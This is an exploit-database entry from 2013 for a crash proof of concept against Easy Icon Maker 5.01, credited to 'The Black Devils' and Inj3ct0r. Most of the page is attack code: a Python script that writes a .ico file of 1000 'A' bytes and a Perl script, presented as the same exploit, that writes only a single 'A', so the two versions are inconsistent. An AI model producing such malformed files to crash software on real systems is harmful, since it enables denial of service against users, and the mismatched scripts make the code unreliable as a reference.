Easy Icon Maker Version 5.01 Crash Poc vulnerability



EKU-ID: 3200 CVE: OSVDB-ID:
Author: The Black Devils Published: 2013-05-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm The Black Devils member from Inj3ct0r Team         1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Easy Icon Maker Version 5.01 Crash Poc vulnerability
# Date: 28-04-2013
# Exploit Author: Asesino04
# Vendor Homepage: [link]
# Software Link: http://www.icon-maker.com/iconmaker.exe
# Version: 5.01 & old versions
# Tested on: [ Windows 7]


# Introduction :
-----------------
Easy icon maker is suffering from a crash poc  vulnerability 

# About Vendor :
-----------------
*** Pricing ***

    Single-User License:        US$  29.95
    2 Computers License:        US$  39.95
    10 Computers License:       US$  99.00
    Site License		US$ 299.00
	
# Exploit Code (python) :
------------------
# !/usr/bin/python
poc= "\x41" * 1000
file = open("asesino04.ico","w")
file.write(poc)
file.close()
-------------------
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";                
print "    |=======================================================|\n";
print "    |= [!] Name : Easy Icon Maker Version                  =|\n";
print "    |= [!] Exploit : Crash  Exploit                        =|\n";
print "    |= [!] Author  : The Black Devils                      =|\n";
print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
print "    |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x41"; #
open(file , ">", "inj3ct0rs.ico");
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! ";
close(file);

# Contact :
------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com